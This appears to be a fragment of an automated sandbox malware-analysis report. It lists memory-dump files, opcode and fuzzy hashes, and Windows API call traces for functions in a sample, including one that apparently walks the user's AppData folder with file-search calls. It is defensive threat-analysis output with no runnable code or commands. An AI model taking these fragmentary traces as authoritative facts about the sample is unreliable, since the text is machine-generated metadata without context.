                  • Associated: 00000000.00000002.2065432203.000000000051C000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2065432203.00000000005FB000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2065432203.000000000061D000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2065432203.0000000000625000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2065432203.0000000000634000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2065686622.0000000000635000.00000080.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2066036021.00000000007D4000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2066051647.00000000007D5000.00000080.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_130000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID: __amsg_exit__getptd$Ex_nolock__updatetlocinfo
                  • String ID:
                  • API String ID: 300741435-0
                  • Opcode ID: 93e21367fe7243f08bc01ac59e52a207d842b21fc1a4e32b48895c84cee4190f
                  • Instruction ID: 559a86e834c3e5421294987819d79e94332504ad59f80e3c4d95b133feab90dd
                  • Opcode Fuzzy Hash: 93e21367fe7243f08bc01ac59e52a207d842b21fc1a4e32b48895c84cee4190f
                  • Instruction Fuzzy Hash: EEF0E93294A700DBD760BBB8588775E33A06F10723F654149F414AB1F3DF6499409FD6
                  Function 00144F40 Relevance: 5.1, APIs: 4, Instructions: 70stringCOMMON
                  Download Yara Rule
                  APIs
                    • Part of subcall function 00148DE0: SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?,?,000003E8), ref: 00148E0B
                  • lstrcat.KERNEL32(?,00000000), ref: 00144F7A
                  • lstrcat.KERNEL32(?,00151070), ref: 00144F97
                  • lstrcat.KERNEL32(?,010288C0), ref: 00144FAB
                  • lstrcat.KERNEL32(?,00151074), ref: 00144FBD
                    • Part of subcall function 00144910: wsprintfA.USER32 ref: 0014492C
                    • Part of subcall function 00144910: FindFirstFileA.KERNEL32(?,?), ref: 00144943
                    • Part of subcall function 00144910: StrCmpCA.SHLWAPI(?,00150FDC), ref: 00144971
                    • Part of subcall function 00144910: StrCmpCA.SHLWAPI(?,00150FE0), ref: 00144987
                    • Part of subcall function 00144910: FindNextFileA.KERNEL32(000000FF,?), ref: 00144B7D
                    • Part of subcall function 00144910: FindClose.KERNEL32(000000FF), ref: 00144B92
                  Memory Dump Source
                  • Source File: 00000000.00000002.2065249327.0000000000131000.00000040.00000001.01000000.00000003.sdmp, Offset: 00130000, based on PE: true
                  • Associated: 00000000.00000002.2065233224.0000000000130000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2065249327.00000000001E1000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2065249327.00000000001ED000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2065249327.0000000000212000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2065249327.000000000037A000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2065432203.000000000038E000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2065432203.000000000051C000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2065432203.00000000005FB000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2065432203.000000000061D000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2065432203.0000000000625000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2065432203.0000000000634000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2065686622.0000000000635000.00000080.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2066036021.00000000007D4000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2066051647.00000000007D5000.00000080.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_130000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID: lstrcat$Find$File$CloseFirstFolderNextPathwsprintf
                  • String ID:
                  • API String ID: 2667927680-0
                  • Opcode ID: 8ca8216d7f199a66644385ecc16a19d18a53e6e8bf8f4bd9049cd9e654b85228
                  • Instruction ID: b7d3a0392f5f07f72890799caabb50d956767b3dd40d054baa646c351909ace9
                  • Opcode Fuzzy Hash: 8ca8216d7f199a66644385ecc16a19d18a53e6e8bf8f4bd9049cd9e654b85228
                  • Instruction Fuzzy Hash: 1621DA76900208B7C765FBB0DC46EED337CABA9301F004548B69D97191EF749AC88B93